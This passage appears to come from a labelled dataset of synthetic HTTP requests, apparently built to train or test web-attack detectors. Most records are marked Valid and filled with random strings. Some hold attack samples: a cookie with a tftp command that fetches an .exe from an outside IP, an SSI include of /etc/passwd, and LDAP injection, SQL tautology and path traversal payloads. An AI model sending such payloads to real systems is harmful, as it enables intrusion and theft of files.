Range: 414-928416,295-3913,33991-
Referer: http://mnmIAn.it/lnxur1s.swf
TE: trailers
Trailer: Referer
User-Agent: 5dnocrio
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 425x931
Via: 1.0 www.naewt.shtml:09, 2.0 www.tiemy.jpg:9982
Transfer-Encoding: compress
Upgrade: hm4tsE/7.7, sngi/4.9, b9nhx/5.1
Warning: 386 233.83.75.168 "ufears" 
X-Forwarded-For: 2.115.5.51
X-Serial-Number: 35520
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 516
Start - Id: 45198
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: www.EeiteaTEa.com
Connection: hnno
Accept: audio/x-wav, video/quicktime;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: deflate
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 122.106.165.4
Cookie: 90Ie=247467;rot8e=468;_jOfPQoptwV=18516;lHl1Ar7h=8602;4Sqonln=33615
Cookie2: $Version="5"
Date: Sun, 19 Nov 06 08:47:33 CET
ETag: W/"5P7OUM98bOhr6Jn"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Thu, 29 Apr 04 22:38:59 GMT
If-Unmodified-Since: Sun, 22 Aug 04 24:26:00 CET
If-Match: "w0ZSW-nE_NJWVtv"
If-None-Match: "@VTB6zQDH-AcBM6Qif"
If-Range: *
Max-Forwards: 9631
MIME-Version: 1.6
Pragma: msi7tS=oaesapy
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: Digest nc=8b2D49ef
Range: 706278-,584316-,-67
Referer: http://www.iouwiad.org/3ocqbel/duseiWse/nbltBk.js
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 0.3; ET-2e; rv:4.5.4) Gecko/88539970
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: FTP/1.5 www.eeimnd.tiff, 1.5 www.acpqao.shtml
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 12.15.76.12
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45198
Start - Id: 27032
class: Valid
GET /FRwpiaexCiarEn.css?4hrslslri=vartm&rjiegRgjes=687458&nsyiorottatw=0945&rSs=697&aegwliyii0b3ER=C3r%28edgroup+byaeIuroe&oLOw.2link=7209690 HTTP/1.0
Host: 169.169.83.164:80
Connection: 9t9eoote
Accept: */*;q=0.3
Accept-Charset: isiri-3342, euc-kr;q=0.9, x-mac-japanese;q=0.5, iso-8859-8;q=0.9, iso-8859-8-i;q=0.4
Accept-Encoding: gzip, compress, compress
Accept-Language: oie-9w
Cache-Control: max-age=1
Client-ip: 111.60.181.37
Cookie: hgnhsLedcem=b4oi.jjxo;wvig1eeaerhJ8=sncs|
Cookie2: $Version="40"
Date: Fri, 31 Aug 07 03:25:11 CET
ETag: W/"a1f3Bl9qZLzjrTVjn6"
Expect: 100-continue
From: RPoOyeue@ifon.de
If-Modified-Since: Thu, 21 Aug 08 24:21:34 UTC
If-Unmodified-Since: Wed, 07 May 08 07:51:31 UTC
If-Match: "ueWBUUGeiQfFu78Nu_W"
If-None-Match: "pOAw_CpH4bgpCrQ"
If-Range: Tue, 08 Aug 06 09:44:10 CET
Max-Forwards: 279
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: tAst smata=oAfq
Range: -2,41933-,520-237717
Referer: /xxsw.nsf
TE: chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: n0eegeiilt
UA-CPU: StrongARM
UA-Disp: 2539,8756,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6860x985
Via: FTP/0.6 229.211.149.237
Transfer-Encoding: deflate
Upgrade: oleg/7.0, eesLi/0.3, s6tY/7.4, Ehnhw1/4.6
Warning: 487 190.19.226.50 "taog3tlnve" "Mon, 04 Jul 05 09:35:24 CET"
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 200865883783933233
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 27032
Start - Id: 36690
class: OsCommanding
GET /eaahei6eBihos/ntrrgHfgFytfnn/6ioltesu9cwA/en4s/brdl/nnah/3link1aGsQshutdownL@y/N0to0ratiy8sntrbaheb/sR6.E8Oy/3z_jHCurP.exe?g4nlwl0ro1qmft=nNge4Qz4l2s&iit=gas0niEs&pcn=ua0&oebeeAent=iev5nybgRrLS&ehh6nDeRes=53654&wp-a1BP=orKeIAg&zxtWadblaseC=01776&d5bo1spAV=oqeembpd&f8aktce51nuuld=dVzzisf3NuBN&uPn=wXla&Uu1kUFe0dDformhomen=petrwj9&aimiAteeTdpdtc=65256093 HTTP/1.0
Host: 45.90.87.121:100
Connection: keep-alive
Accept-Encoding: *;q=0.8
Cookie: dtipoaoet=pmo| 9hi0eannt;tenohokie=tftp  -c    get    36.48.250.160:/ro/ritode.exe|
Date: Fri, 07 Nov 08 05:45:08 UTC
Expect: 100-continue
If-Modified-Since: Tue, 14 Dec 04 21:42:15 CET
Max-Forwards: 139
Proxy-Authorization: NTLM c2JkcElvdWZ0b3RyZWhydG1pbmJ1bmFTaGV3NXJ4b2l1RTFpc05lZWVvdGY=
Referer: /g4yibj/ted8rs/pEdocaoe/ep8w.asp
User-Agent: Mozilla/4.4 (compatible; Konqueror/4.3; Open BSD i386; oauli8)

null

End - Id: 36690
Start - Id: 31109
class: Valid
GET /md.gif?9eecoesdRtn=Atza&ncDi=rrarortumr HTTP/1.0
Host: 113.143.205.10
Connection: close
Accept: text/*, video/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=3601
Client-ip: 6.151.85.21
Cookie: KLzcatperlZBdXGL=899436
Cookie2: $Version="63"
Date: Sun, 08 Feb 04 03:13:18 GMT
ETag: W/"INCb4aafB5vkTC5g"
Expect: 100-continue
From: y6Jyr@oaos.uk
If-Modified-Since: Sun, 23 Jan 05 08:15:47 CET
If-Unmodified-Since: Tue, 19 Dec 06 12:25:11 UTC
If-Match: "MGD@cdaUWLm7vOPl"
If-None-Match: "HSUqOLO@_MY.xw5Qk"
If-Range: *
Max-Forwards: 1131
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic clNjbzpuNWVl
Authorization: Basic ZTUxZTpycnJBcw==
Range: -245173,089218-6894
Referer: http://ornh0.biz/sEat4w/uujwin/at5tsusg.mp3
TE: chunked,gzip,deflate;q=0.2
Trailer: TE
User-Agent: zachimb (niCVCBazsQ; pQkQAz1wE; dodky1gR; evEuWdcIpu; rP.YW5uuDQ)
UA-CPU: MIPS
UA-Disp: 195,195,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1573x3760
Via: 6.6 51.140.12.135:286
Transfer-Encoding: compress
Upgrade: Vpd/5.7, eiJ/4.6, lehe/1.0
Warning: 311 221.48.91.250:29839 "hOdjuaaVchtteasa" "Thu, 31 Jan 08 03:52:06 UTC"
X-Forwarded-For: 80.59.235.174
X-Serial-Number: 16589272146
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31109
Start - Id: 37318
class: LdapInjection
GET /ea7/iea/nataEshsghqa/snta.shtml?YLNOX4LV_=eie&sHlOak=%3FIzD+7eh+&MNesd3lapmGa=3385&mottrtpdentsc=%26&u3eere6=cttmh HTTP/1.1
Host: 249.85.119.137
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l-hl;q=0.6
Cache-Control: only-if-cached
Client-ip: 163.171.38.168
Cookie: bcd8tl=tuizGPU
Cookie2: $Version="95"
Date: Sat, 09 Feb 08 07:36:21 CET
ETag: "SqzTXG3cL_LrKvg7K"
Expect: 100-continue
From: rtec@se2cehaQn.com
If-Modified-Since: Mon, 08 Mar 04 08:01:04 GMT
If-Unmodified-Since: Wed, 30 Mar 05 10:25:29 UTC
If-Match: *
If-None-Match: "r4@o@yIuyqTyNzVgc@sS"
If-Range: "pdoHUpwqfO.s4MJwGbFR"
Max-Forwards: 88
MIME-Version: 4.9
Pragma: n=eoxr
Proxy-Authorization: NTLM UmFncjBlb2E2ZXRTc2Z5bnRUYXRkdGZwYWFncWRwcmFhdG14bnluTG5PcG9vaQ==
Authorization: NTLM dHJvdHR6c2FFcGk5YXQ3c3dzY25pWWR5eHk3ZTh0bnNhZXFpYWx4bm8=
Range: 1-568088,6956-8,075-
Referer: http://www.2chyyr.cz/7yhsieC/ta4eaDtd/ka0o/0ue9mdsn.php
TE: trailers,deflate,chunked
Trailer: Host
User-Agent: )   (  | (    cn=*o'brien*    )(mail  =*o    'brien*    )  
UA-CPU: StrongARM
UA-Disp: 050,5091,32
UA-Color: color16
Via: 8.3 100.197.150.40, 6.7 www.8hAe.tiff, HTTP/2.7 www.nauUrl.shtml
Transfer-Encoding: gzip
Upgrade: cgnl/2.0
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 220.106.136.48
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 37318
Start - Id: 10930
class: Valid
GET /ENa/yUWT/6aqiwhitriiuh0euc5wl/bXJmFNb3_64X4/FqitTcOcinl/cz0Ftk5fT/Iodya.php4? HTTP/1.0
Host: 52.182.10.159:3
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=30430
Client-ip: 184.123.19.129
Cookie: Pmd=mc:asnWservices[7|eiHdkcgE
Cookie2: $Version="4"
Date: Sun, 18 Apr 04 05:28:09 GMT
ETag: W/"RUmme4YGUWFqlPX0riM4"
Expect: horu
From: dmnba@sipo.net
If-Modified-Since: Sun, 29 Apr 07 03:06:45 CET
If-Unmodified-Since: Sun, 16 Nov 08 24:05:43 CET
If-Match: "eZTHDke7p3k8163X"
If-None-Match: "oX-t61FUPUK_rLqQ5"
If-Range: Sun, 15 Nov 09 07:34:49 CET
Max-Forwards: 561
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM bmlhNHIybU5memFNZXZJeHFhcGFuY2ZlYXQybkVlQ3lyc3N0NXl0b2VlRXJlaA==
Authorization: NTLM ZWUxbWVyMGFzN2hlTDBpbm1pYW9hbGV0dE5rb3NlaWhlM2VTZXZtc3Nocm4=
Range: -72,78634-
Referer: http://www.oR2eutc.st/einut/iisrsmno/lrkeb.php
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 0.5; ei-se; rv:5.2.0) Gecko/05622727
UA-CPU: PowerPC
UA-Disp: 256,243,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5309x7001
Via: 9.9 185.238.117.216:2, 7.2 www.fFodsse.jpg:5751
Transfer-Encoding: lwot
Upgrade: tbIe/2.5
Warning: 236 www.anncO0t.jpg "tlYaoiMnHeoasniuo" 
X-Forwarded-For: 213.119.25.206
X-Serial-Number: 847206508501943209
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10930
Start - Id: 22395
class: Valid
GET /9y/ef/3mzR/ueoaEtyriut/tku/cP72cU2CnfUIW/lmS/y1rhn.shtml? HTTP/1.0
Host: 35.130.185.138
Connection: keep-alive
Accept: application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oeg-anmsemw
Cache-Control: no-cache
Client-ip: 243.52.144.44
Cookie: WgUsTzpY=Js;igh=697
Cookie2: $Version="985"
Date: Sat, 20 May 06 23:13:07 CET
ETag: "HgN2ZG4YXpOwahq0gMdK"
Expect: sOoyeA
From: 1eNTR8ie@q3cs.biz
If-Modified-Since: Sun, 22 May 05 22:38:08 CET
If-Unmodified-Since: Fri, 13 Apr 07 09:26:08 GMT
If-Match: "oPWa.1y46EkNzDiW@"
If-None-Match: *
If-Range: Thu, 25 Feb 10 11:30:05 UTC
Max-Forwards: 9
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: rnic hovsi9ai=hhcDiun8
Authorization: NTLM YnZUZTNpY2FyZWhlRWhwVGVldkNpdGRvdGNudW9HY21FOTFVYXQ=
Range: 272882-6
Referer: http://www.r3tRlt.com/egoOO/hc5e/intiemcw.txt
TE: deflate
Trailer: If-Match
User-Agent: Ysahcnelhti
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: HTTP/4.9 104.92.108.227, 8.1 www.segrH2.html, 5.7 www.senhM7.jpeg
Transfer-Encoding: Tltdn; Eiht=e1yu
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 119 96.31.172.55 "sdi57lOeauorRstto" 
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22395
Start - Id: 29659
class: Valid
GET /8autoexecVhtelnetm/tif/foSYO/4akh9scensot5sut/ihEqR/dfahsln3hio/isvOu9/FqG@sZy89@H/tbGSAansupg4lIliV/ekrcpuHc5/aawEjlQ91oKyEWWa.htm?eo=a4Ote%2Bo%3DtdeLoj&has04=eae HTTP/1.1
Host: 245.251.14.251
Connection: close
Accept: text/xml;q=0.7
Accept-Charset: isiri-3342
Accept-Encoding: *
Accept-Language: tinsdtah-ftecaed, 9lctk-laZwayoe, r-WaScsug;q=0.8, c-maWdfF
Cache-Control: no-cache
Client-ip: 253.106.46.66
Cookie: lbooc= lRspn;rYdsh12a8X=527;4nyeB=eneiawun;aqshpo=2605220498;ooslitNe=rlaji3;tsMEbioosCe=ns2script8nf>ei-blscript] ;Eum
Cookie2: $Version="415"
Date: Sat, 20 Jan 07 19:01:39 CET
ETag: "ihpWJEqupB6sBE_6"
Expect: 100-continue
From: o1io9ajb@ssritvoml.st
If-Modified-Since: Fri, 16 Feb 07 21:01:17 UTC
If-Unmodified-Since: Sun, 31 May 09 03:35:19 CET
If-Match: "WUmYfX5tuIc8BCKSNP"
If-None-Match: "YwhH8.1Laacr-dB"
If-Range: "nDpmLkW@9zSGjHJeOAL"
Max-Forwards: 178
MIME-Version: 1.6
Pragma: sejioe=hi
Proxy-Authorization: NTLM N2kzZG9obnRhY2llZWRDemRhYmhueGVlcmFsbnJjb2NjZW9ybW9uWXM=
Authorization: Basic VG5pZWVsOmk1QWFu
Range: 0-345
Referer: /nainceE/rpra.php4
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/6.2 (compatible; eljiersbns; Linux i586; ueuga)
UA-CPU: 68000
UA-Disp: 844,9536,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8055x615
Via: hjal/2.3 www.a3gntf.js, u1i/7.8 www.8csdUi.htm:54, HTTP/4.0 75.242.5.56:241
Transfer-Encoding: gzip
Upgrade: nbyrR/0.6, hSeaai/0.0
Warning: 090 13.131.122.112 "itg25e6tOo" "Sun, 12 Jun 05 20:38:04 UTC"
X-Forwarded-For: 141.21.165.192
X-Serial-Number: 149051815209
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29659
Start - Id: 10606
class: Valid
GET /dryseJgs/st1y0A2X/inio0timhlxuN/21mtf/Dwp-LrgvMt/nc_-Ajo@I/etsrag7etoi1stwmmie/eta1lsaeMkeeaWnansgi/9Ehnshutdown/tmrsr1etieDrs7e0sm/eIc2kwGFXH/OdrIsDv.js?eeut=rqrmia&rPfmtnsu=584&fW_3d=e72oja&e9=25015896&etuUhnO4vefhEoa=70678 HTTP/1.1
Host: www.thi4o3.be
Connection: snbr
Accept: */*;q=0.5
Accept-Charset: isiri-3342;q=0.8, euc-tw;q=0.9, gb2312;q=0.2
Accept-Encoding: identity;q=0.9, gzip;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 70.48.78.78
Cookie: Soin=idahitworadnselpby;tle2iei=otc(buylvbscripta zre8AHuX;ta=<;ianUt=t;dto;b1YivE6=804950;tr3oflon0=dpsk
Cookie2: $Version="1"
Date: Sun, 08 Jul 07 02:59:34 CET
ETag: W/"m8setTt.CEOTvQMHTtS_"
Expect: 100-continue
From: urh4ame@uIj4a1nz.ch
If-Modified-Since: Tue, 19 Jan 10 11:21:27 UTC
If-Unmodified-Since: Fri, 08 May 09 19:49:49 GMT
If-Match: *
If-None-Match: "D2_Ot_JBPtNwC_bOo"
If-Range: "7yOo7yKmV2xwkyF-"
Max-Forwards: 9829
MIME-Version: 4.1
Pragma: Faaf='xs'
Proxy-Authorization: NTLM YUdyVGlhaDVsYmVoMGQ4Z09oMWVhaDdlMXdhZWl5dDNsZXo5OHlz
Authorization: Digest realm
Range: -8,-00,5230-
Referer: /Tqecno/feid0i/EiunfSzo.css
TE: deflate,trailers
Trailer: Host
User-Agent: tiSAmcu2pseeheoEpeTN
UA-CPU: Sparc
UA-Disp: 4542,2926,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9748x5631
Via: 6.6 7.55.14.80:5, 7.6 www.lEnsewbh.jpg, hwssUs/2.3 www.A8nd.html
Transfer-Encoding: identity
Upgrade: telnx/9.9, iusnr/3.5
Warning: 595 239.203.101.239 "rlhjs5iafegTthd" "Tue, 05 Feb 08 07:12:57 UTC"
X-Forwarded-For: 93.154.42.186
X-Serial-Number: 719045121636524930
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 10606
Start - Id: 1899
class: Valid
GET /NcKrwP/t2Octs4ersNn1nth6ah/sietR4meatfie8Orsm/dZ@Bqt/ox_I.bEl/hiHvB-3/aOI5LH2yl/io7.syV@pAklit4WXIX/pmTB7amhhIGIvXr/s.p6J.61MnD25/tKgg39tUr1aPE/T%uBdFJstylecwinntoePicchild.mspx? HTTP/1.0
Host: 104.54.29.214
Connection: eae5b
Accept: application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, compress;q=0.7, gzip;q=0.0, deflate;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 136.226.137.157
Cookie: eaac3sp=iM5Klisgnvjc;ih9hc=81715630;t8ttNo=46;5dlodvfAeefo=a5includeconnecteed3eaos;snb=fl8 ;aw7siMzdropMk=soNu
Cookie2: $Version="83"
Date: Mon, 02 Aug 04 24:05:18 GMT
ETag: "qNutOB3vtTVndh_m@TX"
Expect: 100-continue
From: mddx@tteFnutt.it
If-Modified-Since: Sat, 03 Sep 05 16:34:17 CET
If-Unmodified-Since: Thu, 09 Apr 09 19:30:52 UTC
If-Match: "Kj8yI3aY@i36rBALAI"
If-None-Match: *
If-Range: Thu, 20 Mar 08 12:08:58 GMT
Max-Forwards: 8
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: wrea ltni=8Rsiyra
Authorization: Basic Y3RuZ3RhaTplZTVvaQ==
Range: 3513-,5034-3
Referer: /dn0qeou/jrEmi/ettmog.php3
TE: chunked
Trailer: Expect
User-Agent: enoesNdKat/2.6.3
UA-CPU: PowerPC
UA-Disp: 272,378,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 594x6031
Via: HTTP/5.9 108.68.143.36:48872
Transfer-Encoding: identity
Upgrade: cIes/9.5, tzioo/8.7, otntn/9.0
Warning: 924 www.bbtn.js "trtrnasnAn" 
X-Forwarded-For: 96.142.115.10
X-Serial-Number: 1247280154947
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1899
Start - Id: 39785
class: SSI
GET /rapso9nhem1st/agyHamail/0aNCNUud/droxnhj7h5rtoec/oyUsQ/bM37FZBWe/0-/sZYdk/2TxefydabaLnnn9e/p8JR4Err/nVB.nsf?Lrud=%3C%21--++%23include+virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E HTTP/1.1
Host: 194.226.149.186:80
Connection: close
Accept: image/jpeg;q=0.6, video/*;q=0.3, application/*
Accept-Charset: x-mac-korean;q=0.8
Accept-Encoding: gzip;q=0.1, deflate, gzip;q=0.3, gzip;q=0.3, identity
Accept-Language: i9ebtea-yti;q=0.7
Cache-Control: max-stale
Client-ip: 9.173.197.156
Cookie: bXFaXboot.inizC.a=ni3
Cookie2: $Version="9"
Date: Tue, 09 Mar 10 12:33:58 CET
ETag: W/"Ne7FULYkvbu.-BWNg_8"
Expect: ailel=ewuid;sddttdad
If-Unmodified-Since: Fri, 27 Mar 09 15:51:33 GMT
If-Match: *
If-None-Match: "02z_Tt5wnpQ4NDNmjBID"
Max-Forwards: 6
MIME-Version: 6.0
Pragma: nhasei='D'
Authorization: Digest cnonce="nyaoy"
Range: 153-666
Referer: http://GotttrO.it/avh2hst/ytLsodeo/osniO4se/evzav/eeT3a.php
Trailer: Transfer-Encoding
User-Agent: ls2zf/0.2.2.8.8
UA-CPU: Sparc
UA-Pixels: 181x202
Transfer-Encoding: deflate
Upgrade: Krsn/5.1, q45i98/5.6, ssP5u/2.3, saswai/9.9
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39785
Start - Id: 41682
class: SqlInjection
GET /UX..KAQadminjRD/iKz.gif?lna7VPa1tsUEI=+++++OR++++2++%3E+1 HTTP/1.1
Host: www.7ej2eier.gov
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: 1eT-atEtebn;q=0.5, a0-cr;q=0.2
Cache-Control: min-fresh=024
Client-ip: 106.39.43.168
Cookie: eihren=8639;0j0Ipyh=1522184;23bnp=t-W;8efertr=i7RckUmE.bD
Cookie2: $Version="6"
Date: Mon, 31 Oct 05 17:50:54 CET
ETag: "GYdRMLZJryVuagR3"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 24 Aug 08 20:53:29 GMT
If-Unmodified-Since: Thu, 23 Mar 06 13:43:40 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Apr 05 24:02:52 GMT
Max-Forwards: 24
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: NTLM cnQyc3dhajluYW9ibHIwZWRkTW5tdWQ1ZGNoc3lpaGJld29h
Range: 87689-74,-52021,11-
Referer: /hta8r/9hduoa.php4
TE: gzip;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 0.4; pn-bs; rv:5.1.7) Gecko/63406397
UA-CPU: PowerPC
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: HTTP/9.8 230.23.166.235, FTP/4.4 www.rTd9eze.htm, eurig/4.2 52.151.18.34
Transfer-Encoding: identity
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41682
Start - Id: 3750
class: Valid
GET /hf-@.0ohTDHq-z/rhejni5lrc/fearoDE3eneaofG/njkKMs35/1ee/1JEHTM5Ulservices96/iPM-4RYDlvPnMtAdJB/aQjzBU.Nvhq/lcs/grcFRtSrI/deeseuofn5ljeNh7.mspx?auos5p=fdtlKio4%5Ck&ttert8Eeyg5t=iPPfR HTTP/1.0
Host: www.Aue2mswdd.fr:4
Connection: lhBA
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.4, identity;q=0.8
Accept-Language: retS-4w5s;q=0.1
Cache-Control: min-fresh=96921
Client-ip: 151.163.10.234
Cookie: @GNr=wu0e1kF;oewMoDoeBc=sf;nsiobOoesa2m;higdi=0990067847
Cookie2: $Version="39"
Date: Tue, 27 May 08 23:52:31 GMT
ETag: W/"LDtMPRZa9qNqstK-r2V"
Expect: oIaVvr=noin;e8qi=lCnean
From: cfidsd09@nujp.org
If-Modified-Since: Thu, 18 Jun 09 04:24:39 GMT
If-Unmodified-Since: Sat, 27 Aug 05 17:14:51 CET
If-Match: *
If-None-Match: "RNheQQhoO2eHgov9"
If-Range: Fri, 27 Apr 07 05:54:53 UTC
Max-Forwards: 708
MIME-Version: 0.5
Pragma: apoADsdN=mrge
Proxy-Authorization: Digest realm
Authorization: NTLM cm5zOGViYXN0YXQxb29OdHNzMGV0YW5zdGRyQmd0cmVwdm51bGRGZQ==
Range: -610282,410-9040,-6457
Referer: http://zedke.it/eeoT/tmItF/6azee.cfm
TE: trailers
Trailer: Upgrade
User-Agent: w99llAPQ http://www.suyl.net
UA-CPU: StrongARM
UA-Disp: 079,793,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0475x7705
Via: 6.9 58.253.9.62
Transfer-Encoding: deflate
Upgrade: 3ett/0.9, amuefb/1.7, rjo/0.3, ent6/8.0, 6Liroa/6.9
Warning: 789 116.43.37.160 "mdetioiEteRfea" 
X-Forwarded-For: 2.28.238.117
X-Serial-Number: 68867877
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 3750
Start - Id: 1605
class: Valid
GET /tKrAGwDKDOIQ/tErTN3uWKaY8E@qhR/nazsQ/NYZyw/7fio/hAP-Tz/onviiraka6e/a2FW6K0J4Dh9a/3Sp_/iuIdaeG.msf?3ptfathAL=oNz&sOismttDzeeedU=r5o HTTP/1.0
Host: 87.143.102.105
Connection: 7Ntt
Accept: application/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 42.182.242.216
Cookie2: $Version="985"
Date: Thu, 14 Jul 05 23:53:55 GMT
ETag: W/"6cpkX8A2dmE5vzI0gZEY"
Expect: naeeen3
From: eV0ioi@resn.fr
If-Modified-Since: Sun, 08 Mar 09 01:37:24 CET
If-Match: *
If-None-Match: "zlMp1h76UvQ3OCR"
If-Range: "z5OEQeq_T8m@wr-CZ-"
Max-Forwards: 5830
Proxy-Authorization: Basic c2lFenI6eHR0bGVlYQ==
Authorization: NTLM MnRpdHZvb1N1bXRlYmk3ZXJhbnBvYXNRYXVtdGlySTlPcmNyZTg1ZWZOdkxl
Referer: /nmteesc/nOfe/9bohd.mdb
User-Agent: Mozilla/4.4 (compatible; Konqueror/7.3; WinNT; ay4hisT; qicf; tw1Ehyolie)
Via: HTTP/0.5 www.tcsstS4p.tiff, 0.0 233.139.79.245
Transfer-Encoding: identity
Upgrade: sTSZ/4.6, yc0et/6.6
Warning: 694 254.66.88.83:7 "ithrnim0obb5iieHN" "Wed, 17 Aug 05 12:23:04 GMT"

null

End - Id: 1605
Start - Id: 19401
class: Valid
GET /hdltaHsfAn.swf?iXm=mtHwdnoo4t&dotyph4nteol=o-e&cdwSsO6E=%5D&0pBinsert941Tb=ox.KPM&gnfdndkolsosq=asUhT&snnaixeDerO=sa HTTP/1.0
Host: www.m9hwebl.com:1
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=8663
Client-ip: 76.248.184.253
Cookie: 3ci=aeceIstyleNp iulsa;dwYuswardtgwr=ceodd5wrlnai;zafrntdtoe2hal=etd/m;u4o04=01;orUThkS8=upnatcnst9sSrl
Cookie2: $Version="3"
Date: Sat, 24 May 08 13:17:49 GMT
ETag: W/"un6rCW@GAPiCzDRNfQ"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Sat, 03 Oct 09 19:55:53 GMT
If-Unmodified-Since: Wed, 18 Jan 06 09:50:31 UTC
If-Match: "pklPWloJ4wk15FHV"
If-None-Match: *
If-Range: Mon, 30 Aug 04 17:28:22 GMT
Max-Forwards: 28
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM aW9jckVuZWh1OXRia2xPZWF0bm13cXRSM29nZXBBcnJaYXl3bFRuaGFhc2RwQW9h
Authorization: Basic Y2RmYXRndHQ6ZWVkdWVz
Range: 512940-12029,467-92321
Referer: http://www.9rryt.com/foe9eahs/Budot8jt.mpeg
TE: deflate;q=0.6
Trailer: Expect
User-Agent: l9rurdnYs/8.3
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6070x723
Via: HTTP/4.5 95.41.27.172
Transfer-Encoding: Sosct
Upgrade: 0hnhm/0.0
Warning: 515 6.189.134.75 "7iimeytvetemune1t9e" 
X-Forwarded-For: 72.140.87.177
X-Serial-Number: 5993658067550
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19401
Start - Id: 16800
class: Valid
GET /sY_WkQgGjrqd3-xeNVq/a42UG@/Kmailmochakpasswd4LQcL9QX2-/ftAO9h5xFLF/UwYE/mleeaa/64tnniz7etra/aad/eE@hGqZb4G6hmK5y0oLR/ess51N1ejxF/5SJhaving9XD556XbYQ/ep.html?rb1dlfros=720&E.1jb=a%26%26ml&sidisjosdlje=n9ewgea7u&2F4nondassnzet=access_log%3F&tl5hGsetrass8ki=zZfQV&sihd=%407a%3A-tso+ngoe8%25ie&ody0ur3zg=e3u1IK5MAl_&iwstgvehfrih=ms9an++&y8ae8gh=88999173&c55aeEre=h HTTP/1.0
